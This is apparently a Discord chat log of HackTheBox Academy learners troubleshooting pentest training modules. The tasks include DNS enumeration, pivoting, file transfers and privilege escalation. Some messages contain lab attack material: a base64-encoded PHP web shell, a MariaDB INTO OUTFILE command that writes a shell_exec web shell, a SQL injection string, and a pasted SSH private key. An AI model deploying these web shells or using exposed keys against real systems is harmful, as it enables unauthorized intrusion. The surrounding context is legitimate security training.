#modules

1 messages · Page 222 of 1

ancient needle
#

Right I get that, but the answer options are “not suspicious” “escalate” or “consult IT operations” .. I figured after completing the whole thing they would have some explanation as to why each answer was chosen. Since to me one might seem like an escalation but it ended up being consult IT, but I don’t really know why

shut quest
#

Keep digging. You look at the other pages like author? I don't have my notes for that module off hand but I do remember being really frustrated with THAT question and finding the answer on a page I wouldn't have expected.

fathom pendant
#

The skill assessments don't generally offer any sort of explanations

#

It's mostly meant to be based of knowledge and the module material, maybe something in the material pointed to it -- but you overlooked it

cloud urchin
#

I just went back and did the manual enumeration methods they taught, i was able to find the answer you're looking for. specifically curl with 3 different grep inputs

tranquil axle
dusty plover
#

hi my virtualbox refuses to open the VM issuing error
"Result Code:
E_FAIL (0X80004005)
Component:
SessionMachine"

is this happening to anyone else, this time yesterday it worked and i havent changed anything. No updates, file access isnt a problem

gray jay
#

Humf, Can't reach the IP of the section.
And can't spawn pwnbox

fathom pendant
gray jay
#

2024-03-20 15:38:47 Initialization Sequence Completed

fathom pendant
#

Does ip a only show one tun0?

gray jay
#

yes only one tunX device.

dusty plover
#

ive tried it, as well as disabling Hyper-V and a few other things nothing seems to work. I also restored to an earlier snapshot and it didnt achive anything

upbeat oak
#

for the active infrastrucre identification they gave me 2 vhosts to use but I can't access them on my machine am I supposed to add them to the /etc/hosts file or something? They didn't give me ip addresses to them or am I making this more complicated than needed?

fringe urchin
fringe urchin
#

same applies to hackthebox
like they have other .hackthebox sites aswell under their table
academy.hackthebox (for academy)
app.hackthebox (for Labs)
etc

#

maybe easier to understand if you think about hackthebox

fringe urchin
# upbeat oak Thaank you

if you suceesfully added to the hosts you can visit the website and it wont throw you an error anymore example

upbeat oak
#

did I do this right because I'm still getting the error?

cloud urchin
#

yeah. for future reference you can just do them both in one line, 10.129.245.118 app.inlanefreight.local dev.inlanefreight.local

#

i would double check the box didn't die off due to being up too long, and make sure you're on the vpn

upbeat oak
#

I'll double check but I originally just put it on one line it just kept giving me a error so I tried 2 lines

fathom pendant
#

^

#

You just need a space between them

cloud urchin
#

you can see it already doing it with ::1 and localhost, ipv6-localhost, and ip6-loopback

fathom pendant
#

But it doesn't hurt to have them on separate lines

cloud urchin
#

yeah it's the same difference but it'll just help not having to put the ip every time

upbeat oak
#

It's working now

fathom pendant
#

Just makes your file cleaner

cloud urchin
#

also not sure what box you're on but sometimes it takes a few minutes for the boxes to spawn even if they're online, because the services etc can take some time to launch

fathom pendant
#

That also can be a factor

upbeat oak
#

I think that's what it was

#

@fringe urchin are you doing the whole cpts path or just some modules from it?

fringe urchin
topaz zenith
#

So I am in the Shells And Payloads Live Engagement Module, one question, is the host that you RDP into just not supposed to have a web browser?

upbeat oak
#

I got the correct answer for the cms but a little still confused on what a cms is

cloud urchin
#

CMS is a content management system, it lets you build websites without prior knowledge of code, so you don't have to code the site. like wordpress.

topaz zenith
#

I do not see it anywhere

fathom pendant
#

Type it in the terminal

shadow current
#

Idk if this is off topic but i saw a linkedin post its like a prolab? Named hailstorm/cyclone/blizzard may I ask are those part of the prolabs subs or what? Its my first time hearing about them and im ineterested!

topaz zenith
#

Not working, connection refused.

fathom pendant
fathom pendant
charred yarrow
#

well did somebody can tell me how to get start in reverse engineering or get into modding
or making paid game available for free like pirate bay

#

i have learn c c++ and java

topaz zenith
fathom pendant
#

Well it worked fine for me when I did it

#

Remember they give you 3 targets to focus on

fathom pendant
fringe urchin
#

About modding games hackthebix academy has a module about that. No clue how good it is tho

fringe urchin
fathom pendant
#

Not so much for AAA games

fringe urchin
topaz zenith
#

Yeah so am I supposed to rdp to each one of these from the foothold machine? Good lord

fathom pendant
topaz zenith
#

Ok well I need a web browser and nothing is here.

fathom pendant
#

Yes there is

#

It's just not in the gui to click on

#

Open a terminal in the host, type firefox hit enter

topaz zenith
#

No protocol specified
Unable to init server: Could not connect: Connection Refused
Error: cannot open display: :10.0

fathom pendant
#

Are you rdp or ssh into the foothold

#

Cause that's just odd

topaz zenith
#

Used xfreerdp as instructed

fathom pendant
#

Weird, and you're not trying to open it with root. Yeah?

cloud urchin
#

connection refused, confirm ip and port

fringe urchin
#

Maybe target went offline? Refresh the htb page?

fathom pendant
#

Well if they're just launching firefox with no arguments, it shouldn't give any error like that

cloud urchin
#

if the target was offline you wouldn't get a connection refused

fathom pendant
cloud urchin
#

has to be online to get refused

fringe urchin
fathom pendant
#

And the targets for the Shells and Payloads module - Live Engagement are on an internal network

fringe urchin
#

I shall stay silentduckthumbsup

topaz zenith
#

Yeah it was root 🤣. Fml lol

fathom pendant
topaz zenith
#

Yeah I su’d to herb-student. It just gave me root when I logged in didn’t realize it

#

Htb-student *

stiff parrot
#

history

upbeat oak
#

Yeah subdomain active enumeration is stumping me with the text records tried nslookup and dig and got nothing
Maybe I'm using the wrong domain 🤷🏿‍♂️

fathom pendant
cursive copper
#

Hello

upbeat oak
fathom pendant
fringe urchin
#

its in plain sight

#

first time seeing an optional exercise, are they worth doing or its just there so you COULD try out all other methods from File transfer that you didnt get to use in the 2 questions above?

fathom pendant
fringe urchin
#

right so i see how other stuff works. yea i figured better to ask if they are worth here since i saw you talking that most ppl just skip em ty

fathom pendant
#

as has been shown multiple times in here, people forget the basics of file transferring

fringe urchin
fathom pendant
#

and it's good to at least understand different methods, that way if A fails, you still have B

fringe urchin
#

yea right

#

and its better to have somehwere a screenshot of a working B transfer

#

so you dont need to troubleshoot on another host where its example blocked

clever topaz
#

hi im in linux pass the hash section, ive got the flag but it is malformed

#

what should i do

fathom pendant
#

it sounds like it may have gotten malformed in smbclient can you read the file?

clever topaz
#

nvm i just realised it was a fake flag

fathom pendant
clever topaz
#

the real flag is at the user directory HAHAHAH

fringe urchin
fathom pendant
#

imagine that's the file for another challenge though

clever topaz
fathom pendant
#

print prints it to a local printer iirc

#

you can do like type or more

#

remember SMB is a windows based protocol

clever topaz
#

nope both method wont work

fathom pendant
#

dork

#

i meant connect with smbclient directly

#

don't download files or do anything fancy

#

just connect, and don't send the command flag

#

perhaps it's treating the file weirdly

#

iirc this one was a bit silly

#

also aren't you meant to be connectiong to carlos's share for his flag?

marsh echo
fathom pendant
#

that's highly unlikely

clever topaz
fathom pendant
marsh echo
#

We agree that there is a module that asks you to log in with the user Kira and his password love? from memory I don't remember it I can't find this section, but I made it.

bright robin
#

what are your views about Indian hackers?

fathom pendant
#

but none of the answers contain her pw

fathom pendant
bright robin
#

@fathom pendant wanna answer the question I asked?

cloud urchin
#

lmao

bright robin
#

Anyone?

fathom pendant
#

as I don't really get the underlying question: if you're referring to scammers, they aren't hackers

cloud urchin
#

i wish they'd block this channel off without going through #welcome first

bright robin
#

Nah I m not referring the scammern

#

Scammers! **

fathom pendant
#

then I don't get the point of your question, aside from potentially being racist

acoustic owl
bright robin
#

@acoustic owl It redirected me here!

fathom pendant
#

no it didn't

bright robin
#

It actually did!

fathom pendant
#

this is just one of the few channels you can see without being verified

acoustic owl
#

@bright robin No, it didn't

bright robin
#

Oh ThnQ

shut quest
upbeat oak
#

can I get another hint on finding the txt record? every subdomain I use I get an't find inlanefreight.htb: No answer

fringe urchin
upbeat oak
#

would you still need to put the ip address after the domain?

#

i'm going to switch to using dig instead see if i get something different

thorn urchin
fringe urchin
#

Well with dig yes

upbeat oak
#

damn lol I'm really not understanding anything but the first 2 questions for this one

fringe urchin
upbeat oak
#

and here I thought I would be done with this module today lol

junior oxide
#

in the client-side validation when i modify the HTML and remove whats inside the onchange and try to upload it works but the source comes to me as base64 and i get something like that data:application/x-php;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8+Cg==

fringe urchin
#

Yea but wrong subdomain

upbeat oak
#

Well shit

fringe urchin
#

If the flag isnt there its the wrong subdomain

upbeat oak
#

Okay will keep looking

fringe urchin
#

There is like what around 20 subdomains iirc

junior oxide
#

file upload - client-side validation

fringe urchin
upbeat oak
#

They all give me this

fringe urchin
#

<@IP>

#

Oh its nslookip

#

Withoit @ then

#

Just the <IP>

#

Just because you have access to it doesnt mean other tools like dig etc can resolve the correct ip thats why you need to specify it

upbeat oak
#

I think I need to revisit my footprint notes on DNS ik this shouldn't be hard but all these questions are getting me

fringe urchin
fathom pendant
#

yeah, the module has you use nslookup, which is alright, but dig is far better

#

but either one you need to specify the name server you're querying

shut quest
upbeat oak
#

Another q do I need to put the target ip in my etc hosts for the other questions 🤔

fringe urchin
fringe urchin
# upbeat oak Got it

I would suggest first finding the correct TXT zone for the question. Before going for 2 questions that are after it

cloud urchin
#

Doing Modern Web Exploitation Techniques, SQLi websockets section. I'm trying to follow along in the module, but the victim box isn't behaving like the module shows. It says to enter " UNION SELECT "1 which I do, and in the example it shows a successful SQLi, but when I do it, it adds a backslash before the double quote. The module doesn't say anything about this or bypassing it. Am I doing something wrong? I feel like this isn't the intended behavior of the victim box. Green is example. red is following the example.

#

sqlmap is also unable to exploit it, but the module says it can

timber hatch
#

You are targeting the inlanefreight.htb domain. Assess the target server and obtain the contents of the flag.txt file. Submit it as the answer., attacking common services, i am logged into the mysql server,,,but i dont get it what i have to do next...

timber hatch
#

Skills Assessment the easy one

crystal steeple
#

Check your rights, you have write access

#

So you may be able to get RCE no? 🤔

timber hatch
#

||MariaDB [test]> SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE '/var/www/html/webshell.php';
ERROR 1 (HY000): Can't create/write to file '\var\www\html\webshell.php' (Errcode: 2 "No such file or directory")||

#

it seems like i do not have write access?

next bronze
#

"no such file or directory"

soft cedar
#

^ Everything you need can be found in the txt file from ftp including the right webroot directory.

timber hatch
#

aaah oh my god. never would have thought at tht note. thx

upbeat oak
#

so this is the list of subdomains I'm using to find the txt record is this the correct list I used dig axfr inlanefreight.htb @targetip

fringe urchin
# upbeat oak

Yess one of those is the correct one.
The target IP is the IP on the website and not the ones of the right side. Just in case

upbeat oak
#

ahh so I was supposed to use the target ip for each sub domain

#

I was using the ips given in the list of zones

fringe urchin
#

use the one from the website for all

upbeat oak
#

still lost on the other questions but feels good I'm done with that one

fringe urchin
upbeat oak
fringe urchin
upbeat oak
#

tracking will do

upbeat oak
fringe urchin
#

Everyone should go their own speed

#

Im not going fast either

upbeat oak
#

Im pretty much like that as well and I get that

#

question for anyone cpts path is more tailored toward network penetration testing vs web correct with a little web or am I looking at it wrong?

ocean meadow
#

Hello

ocean meadow
#

Hey

upbeat oak
soft cedar
winter arrow
#

Which of the routes that AutoRoute adds allows 172.16.5.19 to be reachable from the attack host? (Format: x.x.x.x/x.x.x.x)

#

apparently nothing is right i don't pivot with metasploit

fathom pendant
winter arrow
#

i tried the two 172s

#

guess this is another one to skip

fathom pendant
#

it's asking for ip/mask

winter arrow
#

thank you lol i wish it woulda just said that

upbeat oak
#

So I'm doing the virtual hosts part and am using ffuf with seclists namelist.txt to find subdomains but the list came out huge however that is what I assumed they wanted us to do am I at least thinking correctly on this one?

fringe urchin
#

In the module its explained already how to filter them iut via size

tiny lynx
#

Hey all with the question: "Study the following resource https://blogs.vmware.com/security/2022/09/threat-report-illuminating-volume-shadow-deletion.html to learn how WannaCry performs shadow volume deletion. Then, use yarascan when analyzing "/home/htb-student/MemoryDumps/compromised_system.raw" to identify the process responsible for deleting shadows. Enter the name of the process as your answer. " i dont think i quite understand the question i know how vss works but that dont seem to be right answer can anybody help me with a hint ? 🙂

shut quest
runic remnant
#

Im working on "Windows Privilege Escalation Skills Assessment - Part I" and I got printspoofer on the target and nc.exe, it keeps giving me the same error but recognizes the impersonate.

next bronze
#

try another tool

crystal steeple
#

just go to Windows PE module --> SEimpersonate section

#

and follow their command

rustic sage
#

Anyone on an iPad

#

I wanna knock out some modules

runic remnant
runic remnant
sleek moss
#

do u guys take notes of what u figure out in labs too?

fathom pendant
#

it's a good way to understand the mindset

#

saves re-googling stuff or needing to re-remember something

clever topaz
#

i tried to use evilwinrm to get access to host 1 and now i want to get shell to host 2 which is inside the internal network, do i need to do pivoting because i tried to nc host 2 via host 1 and got the shell but it is not interactive (do not get any response)

rustic sage
#

I had so many problems with that lab

#

I had to reset it many times

clever topaz
#

my lab?

rustic sage
#

Yeah

#

Are you doing the pivoting portion of academy?

#

The CPTS path?

fathom pendant
#

it's not strictly required for the lab, however

clever topaz
#

which ill need to access to DC01 from host 1

fathom pendant
clever topaz
#

yes i can rdp just want to know why direct nc wont work

next bronze
#

if you don't want to follow the question instructions, psexec should work, you'll need to pivot tho

clever topaz
#

thanks for the info

next bronze
#

imo passing the hash from one windows machine to another to get a revshell kinda defeat the purpose since you can usually directly autenticate to it

clever topaz
#

im on pth linux, i cant find the keytab/cache for linux01

soft cedar
clever topaz
#

tried

soft cedar
clever topaz
#

ooo i see

#

its not necessary to be named as linux01.keytab

soft cedar
#

it just doesnt have LINUX01 attached to it xd

clever topaz
#

xD

shadow current
#

Linux Local Privilege Escalation - Skills Assessment

i found the flag 4 and now have a website with user T and i want to get a reverse shell from the webshell i uploaded to use it to escalate my privellege can someone give advice on how can i get a reverse shell from here?

novel hinge
#

do i need to put my password in a text file? or is this command indiccating what file to download? its saying Now we can begin transferring files. We need to specify the IP address of our Pwnbox and the username and password.

next bronze
#

scp user@ip:/file/path /local/path

novel hinge
#

decided to do http server and curl it, but thanks forr that adding to my notes 😛

next bronze
#

also works for upload
scp <local path> <user>@<ip>:<remote path>

novel hinge
#

@next bronze and youre using ur tun ip from the openvpn right?

#

you just have to start an ssh server on ur machine forr this

next bronze
#

no, you connect to the target ip

novel hinge
#

for the download one* for this lesson i had to ssh into target and download a file to use hasher

#

i still use target ip? or my box for the ip for downloading

next bronze
#

the box ip

novel hinge
#

got it thanks !

next bronze
#

it also works the other way around if you want to run the ssh server, just that you need to swap the upload and download

spiral spoke
#

Hello! I've been stuck for hours in Command Injection / Skill assessment, someone could help me please? or a hint? it's about the following:

||if I am not wrong, at the injection part, the application tries to do some action, BUT, the thing is that every command that I try to inject (obviously in an obfuscated way), it tooks me like for example: 'cat' is not a directory, 'mv' is not a directory...
Alright so I'll use flag.txt to move taking it's own 'mv' mechanism of the web app but...* Permision Denied * pepehands ||

SOLVED!
But Holy Sweet baby... what a Lab toomuchtroll pepegun_hand

cloud urchin
#

honestly feel like this one is actually broken

shut quest
green smelt
#

Intro to digital forensic : Skills Assessment
question4 : Determine the folder that contains all Mimikatz-related files and enter the full path as your answer.
Hint : Enter the parent folder of either "Win32" or "x64".

could anyone help me on this question ,iam stuck at finding around the collection had given in the machine to find the folder related to mimikatz

dreamy yew
#

**Module: Attacking Common Services, Section: Attacking DNS, **Question: why does subbrute not able to resolve the subdomains for inlanefreight.htb?

cloud urchin
#

resolving hostnames has nothing to do with a specific application, but instead how your resolver resolves those hosts. if an app isn't able to resolve it, it means your resolver can't. in this case, on a private network, your computer would need to call out to the internal nameservers within that private network to resolve the hostname. that's why you just add the hostname to /etc/hosts, because it forces your computer to resolve those hosts you have input there into the IP you chose. so it's not resolving it because your computer's nameserver is likely calling out to your public ISP's nameserver to resolve the host, which it can't because the public nameserver has no idea what your private hostname resolves into.

#

the modules i've worked on that require several subdomains to be resolved have given me those hostnames and told me to add them to /etc/hosts, so maybe you missed that part

dreamy yew
#

I have added the target-ip into the resolvers.txt in the subbrute dir, and ran ./subbrute.py inlanefreight.htb -s names.txt -r resolvers.txt

cloud urchin
#

gotcha

#

sometimes tools don't always pick stuff up and you have to use another tool

dreamy yew
#

and i did add the ip into the etc/hosts and name it inlanefreight.htb

#

or did i miss out smth else haha

cloud urchin
#

the resolvers.txt tells your computer which nameservers to call out to, so when using that syntax you actually do call out to hackthebox's internal nameservers, so you should be able to resolve them without them being in /etc/hosts.

#

which hostname are you unable to locate with subbrute

dreamy yew
#

i could not locate inlanefreight.htb with subbrute

cloud urchin
#

which question are you on

dreamy yew
#

the only question for Attacking DNS: ```
Find all available DNS records for the "inlanefreight.htb" domain on the target name server and submit the flag found as a DNS record as the answer.

cloud urchin
#

one sec let me try

dreamy yew
#

appreciate it 🙂

west oak
#

can somone help me download hashcat

cloud urchin
#

remove the ip from your hosts file, it's not required for this. you use that ip as the nameserver only

dreamy yew
#

Ok can I pm u?

cloud urchin
#

yeah

brittle crest
#

Does anyone know how to proxy nmap thru burp or ZAP.
proxychains.conf has been changed to the include 127.0.0.1 8080
proxychains nmap .....etc
and
nmap --proxies http://127.0.0.1:8080 .....etc
both complete but nor ZAP or Burp capture any traffic

cloud urchin
#

if proxychains is configured you just use that command. like: proxychains nmap -sV -sC 10.10.10.10

tiny lynx
brittle crest
desert trout
#

sorry I'm just new and want to learn how I can start instance? It says Free users are allowed 1 Pwnbox spawn per day.

cloud urchin
#

@acoustic owl can you confirm if modern web exploits sqli section is working as intended?

#

i honestly think it's broken

next bronze
#

check what if you can access with the creds you have, maybe some shares

acoustic owl
cloud urchin
#

lol the contact page says go to discord

compact patrolBOT
acoustic owl
#

There is no official support on Discord.

cloud urchin
#

i can see it over there

acoustic owl
#

You should see the green bubble also on the academy page

cloud urchin
#

i'll have to deal with it later, it's saying i have adblock which is preventing me from contacting support. i disabled ublock and pihole and it still doesn't work.

next bronze
#

you can just ask here

#

Yea check what you can access with the creds you have

inland shoal
#

holy is it my problem or htb currently

sonic arch
#

Did you mange to solve it? I am stuck there as well.

acoustic owl
mossy nebula
#

Hi

snow ridge
#

@next bronze Got it, I have to say this was one of the hardest steps in skills assessments what I have encountered in htb academy.

cyan gulch
#

Anyone else having laggy latency on HTBA?

#

It's much more laggier with ping then usual

clever topaz
#

whats this error?

autumn pilot
#

I don't see any errors

clever topaz
#

it wont crack the hash

#

look at the time it ran

#

0:00:00:01

#

solved ahhahaah

rustic sage
#

Hey everyone 🙂
I'm stuck in this question since a couple of days.
Find all available DNS records for the "inlanefreight.htb" domain on the target name server and submit the flag found as a DNS record as the answer.

its in the ATTACKING COMMON SERVICES --> Attacking DNS module.

I ran python3 subbrute.py inlanefreight.htb -s ./names.txt -r ./resolvers.txt after i added ns.inlanefreight.htb and ns1.inlanefreight.htb to the resolvers.txt.

after an hour or two i got these subdomains:
inlanefreight.htb

so this is what my /etc/hosts file look like now:
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

10.129.103.34 inlanefreight.htb

i can't perform any zone transfers ... and i dont know exactly know what to do next.
any tips ?

cloud urchin
fathom pendant
#

one of those subdomains is correct, and I suggest removing that part of your message, as that's a spoiler

#

you also don't need to add them to your /etc/hosts

#

(it's not a guarantee that those subdomains are even on the same IP)

rustic sage
#

I see, thank you both 🙂
I will try again

fathom pendant
#

dig - @ip
nslookup - add the ip after the subdomain

#

you're still querying the same server

rustic sage
#

okay i see 🙂
thanx alot

dreamy yew
#

Trying to get another perspective on Module: Attacking DNS, Question: Why can't the subbrute.py working as it should be? ```
./subbrute.py inlanefreight.htb -s ./names.txt -r ./resolvers.txt -v

#

resolvers.txt only contain the target ip

fathom pendant
cloud urchin
#

yeah it does work, mine works fine

#

you have something wrong in resolvers or names

fathom pendant
#

but aside from the verbose info

fathom pendant
cloud urchin
#

oh true, don't use verbose lol

woven igloo
#

gogo

cloud urchin
#

its not failing or anything just showing extra info that's irrelevent

fathom pendant
#

so instead of clean output it's messy/all info of every step

fathom pendant
fringe urchin
#

Module: File transfers
Linux File Transfer Methods
So after upload the upload_nix to the server i wanted to unzip i manage to do it without many problems but want to know what other people use/prefer if on the system is not much installed?
like unzip and jar didnt work since they aint installed so i wrote a quick python3 script that unzipped it
are there any other methods that are better?

#

(in a scenario where you NEED a zipped file on the server)

cloud urchin
#

gunzip

fringe urchin
# cloud urchin gunzip

just tried it out, had to rename zip to gz then it worked and gave me the same hash as the one with my python3 script. looks less of a hassle lol

#

ty

cloud urchin
#

haha definitely

fringe urchin
#

Tar prob would have worked too KEKW

fathom pendant
#

but idk, been a minute - i don't recall issues with unzip

fringe urchin
#

sudo apt install unzip
[sudo] password for htb-student:
htb-student is not in the sudoers file. This incident will be reported.kekw

fathom pendant
#

The labs aren't internet facing

fringe urchin
#

not connected to the internet i assume as many others

#

yea ok ic

charred sable
#

Hello, I've encountered a problem with the "Attacking Common Services Module" in the Attacking SQL Databases section. When attempting to connect to the database using the provided credentials, neither sqsh nor mysql are successful; only mssqlclient.py establishes a connection successfully. Additionally, I'm experiencing connectivity issues with the target machine, as it loses connection every few minutes.

fathom pendant
charred sable
boreal heron
#

Where can I find the modules I liked?

#

i've been looking for it for an hour

cloud urchin
#

dashboard

boreal heron
#

whatttt

#

the hell

boreal heron
cloud urchin
#

haha yeah i wish it had its own section

rustic sage
#

Hey im back again 😦
I'm sorry to bother you again, but i tried everything again ... and still no luck

From the module i can see that
dig AXFR @subdomain.inlanefreight.htb inlanefreight.htb is used and i tried it on all the subdomains i found. But im not getting anything other than : dig: couldn't get address for 'subdomain.inlanefreight.htb': not found.

I know MarcieLee told me not to add the subdomains to the /etc/hosts but i tried it anyways (out of desperation) and i got this output:
; <<>> DiG 9.19.21-1-Debian <<>> AXFR @subdomain.inlanefreight.htb inlanefreight.htb
; (1 server found)
;; global options: +cmd
; Transfer failed.

boreal heron
#

what's the name of this module

fathom pendant
#

dig axfr subdomain.inlanefreight.htb @ip

cloud urchin
fathom pendant
#

nslookup is the one that's positionally dependent

#

nslookup -query=AXFR subdomain.inlanefreight.htb <nameserver or ip>

rustic sage
#

thank you guys i got the answer 🙂
i will read the documentation about dig and nslookup .. this is important information that i should be ready for in the exam.

round crescent
#

Hi all, bit of a weird one - I am going through the "Packet Inception, Dissecting Network Traffic With Wireshark" module (https://academy.hackthebox.com/module/81/section/789) - I've got question 2 answered, but question 1 is giving me issues.
I am just not seeing any image transfers on HTTP. I can see an image transfered over FTP, but that's not correct. The question hint gives 2 file names that I should apparently be seeing, but I am not. Starting to go around in circles now, questioning whether this is just a bug...

fathom pendant
#

In this case, you're using the ip/ns of inlanefreight.htb to query/ask the subdomain for information

dreamy yew
#

Module: Attacking email services, Question: I am trying to brute force password for user m***** using Hydra but unsuccessful

#

Command: hydra -l m***** -P passwords.list -f <targetip> smtp/pop3/imap

fathom pendant
#

Are you including the domain as part of his username?

dreamy yew
#

Nope I didn’t

fathom pendant
#

Try

#

Also idr if pop3s or imaps is running

dreamy yew
#

Let me check back my nmap results

#

Ty!

rustic sage
faint gulch
#

Has anyone encountered this issue before? Not sure how to solve it, and searching did not help much so far. It is related to the last question on Using CrackMapExec > Gathering Information with an Admin Account > Command Execution :

$ cat julio_keys1
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
QyNTUxOQAAACCrI/ReOZ1wcRKjjmJTiWnX9feoaU148N9zzx9HndCLlwAAAKDZV8HX2VfB
1wAAAAtzc2gtZWQyNTUxOQAAACCrI/ReOZ1wcRKjjmJTiWnX9feoaU148N9zzx9HndCLlw
AAAEAFMHScrsfTE72yeZbJB5CCOq+mf4M/T4EBHW99Gj3GEasj9F45nXBxEqOOYlOJadf1
96hpTXjw33PPH0ed0IuXAAAAGGlubGFuZWZyZWlnaHRcanVsaW9ATVMwMQECAwQF
-----END OPENSSH PRIVATE KEY-----

┌──(kali㉿CSpanias)-[~/htb/pentester_path/cme]
└─$ file julio_keys1
julio_keys1: OpenSSH private key

┌──(kali㉿CSpanias)-[~/htb/pentester_path/cme]
└─$ nxc ssh 10.129.204.178 -u julio --key-file julio_keys1 -p '' -x 'type ~\desktop\flag.txt'
SSH         10.129.204.178  22     10.129.204.178   [*] SSH-2.0-OpenSSH_for_Windows_7.7
SSH         10.129.204.178  22     10.129.204.178   [-] julio: (keyfile: julio_keys1) unpack requires a buffer of 4 bytes

Thanks in advance!

clever topaz
#

how to open a word document that is password protected?

#

libreoffice and xdg-open dont support password input

crystal steeple
#

Libreoffice do

cloud urchin
clever topaz
cloud urchin
crystal steeple
clever topaz
#

oh

#

my libreoffice corrupted

tidal kelp
#

On the Module Cracking Passwords with Hashcat > Identifying Hashes - Which format should the answer be? I've found the hash but its not accepting any versions of the answer

paper gust
#

or the name?

tidal kelp
#

just say 'Identify the following hash:

#

ran hashid but its not accepting the answer :/

paper gust
#

hmm, i'd need to look back at the module

faint gulch
# cloud urchin As long as your key file is correct that should work. try CME not NXC. Looking a...

Thanks, but it produces the same error:

$ cme ssh 10.129.204.178 -u julio --key-file ~/htb/pentester_path/cme/jul_ssh.priv -p '' -x 'type ~\desktop\flag.txt'
SSH         10.129.204.178  22     10.129.204.178   [*] SSH-2.0-OpenSSH_for_Windows_7.7
[13:52:49] ERROR    unpack requires a buffer of 4 bytes                                                           ssh.py:172
                    ╭──────────────────────────── Traceback (most recent call last) ────────────────────────────╮
                    │ /home/kali/.cache/pypoetry/virtualenvs/crackmapexec-ODn8AvZr-py3.11/lib/python3.11/site-p │
                    │ ackages/paramiko/pkey.py:525 in _uint32_cstruct_unpack                                    │
                    │                                                                                           │
                    │   522 │   │   │   │   │   arr.append(s)                                                   │
                    │   523 │   │   │   │   if f == "i":                                                        │
                    │   524 │   │   │   │   │   # long integer                                                  │
                    │ ❱ 525 │   │   │   │   │   s_size = struct.unpack(">L", data[idx : idx + 4])[0]            │
                    │   526 │   │   │   │   │   idx += 4                                                        │
                    │   527 │   │   │   │   │   s = data[idx : idx + s_size]                                    │
                    │   528 │   │   │   │   │   idx += s_size                                                   │
                    ╰───────────────────────────────────────────────────────────────────────────────────────────╯
                    error: unpack requires a buffer of 4 bytes
#

I will try from a parrot instance

cloud urchin
#

weird that you're just typing cme and it's calling to poetry and venv

faint gulch
cloud urchin
#

try running it normally outside of the venv or something

tidal kelp
paper gust
#

ok

tidal kelp
#

probably had a typo or something

faint gulch
cloud urchin
#

it happens! glad you at least narrowed it down and could complete the task

fathom pendant
#

Something is messed up with your venv instance probably

faint gulch
late galleon
#

is it best to get CPTS or Academy to study for OSCP?

fathom pendant
#

If it's been disabled definitely go to insta support

#

Otherwise, nothing we can do for you brother

west oak
#

bruh they wont respond to anything

#

ive sent so many emails

fathom pendant
#

Hacking Instagram is not something we can do

west oak
#

do u guys know how to code me out of it>

fathom pendant
#

I suggest not breaking platform ToS to get your account disabled

cloud urchin
fathom pendant
late galleon
west oak
#

oh i didny know

fathom pendant
late galleon
#

trying to decide

cloud urchin
west oak
#

does any1 know herer that has any type of contact with some1 that works for insta\

late galleon
cloud urchin
fathom pendant
#

This isn't even remotely the appropriate channel

late galleon
#

or more I think

dim wolf
cloud urchin
#

ok, but if your plan is to get an ocsp cert, you need to buy their stuff.

late galleon
cloud urchin
#

now is oscp worth it is a whole other question. you cannot beat the price to value ratio of htb, the content here is top tier

#

but you're asking 'i want to pass course a, should i learn about b to learn about a?'. like you're asking if taking sec+ will help you pass net+.

late galleon
#

i guess ill just get the academy to help me

#

the content is all still relatd

#

related. its all cybersecurity

cloud urchin
#

yeah but they're going to have different standards for things, like reporting

#

if you want to get a specific cert, then you should study the course for that cert, not some other course, it doesn't make sense

#

if your goal is learning cybersec, then yeah sure it doesn't matter, but that was not the premise of your question

late galleon
#

im getting a lot of diferent answers

cloud urchin
#

and idk why you're arguing it when you're the one who asked the question lol seems like you already made your mind up

#

well everyone but me is wrong

late galleon
#

just saying that there are a lot of different opinions on it

fringe urchin
#

Cpts modules make you ready for oscp but that doesnt mean you should go for the cpts course, not take it but take oscp instead

#

If you want oscp cert go for the oscp learning modules. If you going for cpts go for the htb modules

dim wolf
#

if you're using the CPTS course to study for OSCP you might as well just do the CPTS exam

#

and then go do OSCP

#

it's a win-win imo

dusk mortar
#

i have a question in the Linux fundamentals module: "what is the name of the last modified file in the "/var/backups" directory? i use the cmd 'ls -la -t' which works fine. but then i saw 'ls -lat' which gave me the same results. if i am adding options to a command, lets say hypothetically 'ls -la -t -a -b -c' i can combine them like so: 'ls -latabc'? if so, does this work with all types of commands?

cloud urchin
#

yes, you can, doesn't work on all commands though

dusk mortar
#

thanks. that is pretty awesome to know

clever topaz
#

crackmap winrm is hydra rdp?

cloud urchin
#

is that a question

clever topaz
#

yes

fathom pendant
clever topaz
#

ah shit

fathom pendant
#

winrm = windows remote management
rdp = remote desktop protocol

#

winrm is gonna be CLI access

clever topaz
#

ooo

#

cmd i suppose

fathom pendant
#

well it's usually set up to drop users into a powershell session

clever topaz
#

oo its powershell

fathom pendant
#

you'll know if you have the PS in front of the current working directory

clever topaz
#

actually how hard the exam is compared to the practice labs on the scale 1 - 10? or i shouldnt ask

fathom pendant
#

PS C:\windows\system32>

fathom pendant
#

the exam won't have leading questions that point you to the method of obtaining the flags or even users

clever topaz
#

ngl im not confident at all since i struggle even on labs

#

aaaaa

cloud urchin
#

i'll give you some freebie users, root and administrator

#

thank me when you pass the exam

fathom pendant
#

the biggest pre-test is gonna be doing the Attacking Enterprise Networks module completely blind

soft cedar
fathom pendant
#

as in; just spin up the lab and go for total network compromise. don't read questions, and try to limit yourself on asking for help

#

it's why it's one of the capstone modules

cloud urchin
#

do 200 htb machines

heavy edge
#

dude i see so many people stressing over the CPTS is it that hard/

#

i aced ejpt but now im worried

cloud urchin
#

well i don't think anyone's going to say it's easy

fathom pendant
cloud urchin
#

the standards are really high, so be thorough and know your stuff

#

yeah that too

fathom pendant
#

both are regarded as intermediate skill based exams

#

OSCP is mostly only tough due to it's time restriction and tool restriction

#

CPTS is tough because it's a 10 day exam to go from start to Domain Compromise AND write a professional-grade report in that same time

woven igloo
#

hi

cloud urchin
#

and their training. at least their old stuff. i've heard mixed reviews of their new course.

fathom pendant
cloud urchin
#

yeah it's top tier for sure

minor stag
#

I'm probably just missing something in the modules, but I'm on the first question section of SQLMap essentials and I cannot figure out how to enumerate a table. I haven't found anything in the instructions.

heavy edge
#

so i have 10 days to compromise AND write the report?

#

i thought it was an additional added on to when you finish the exam

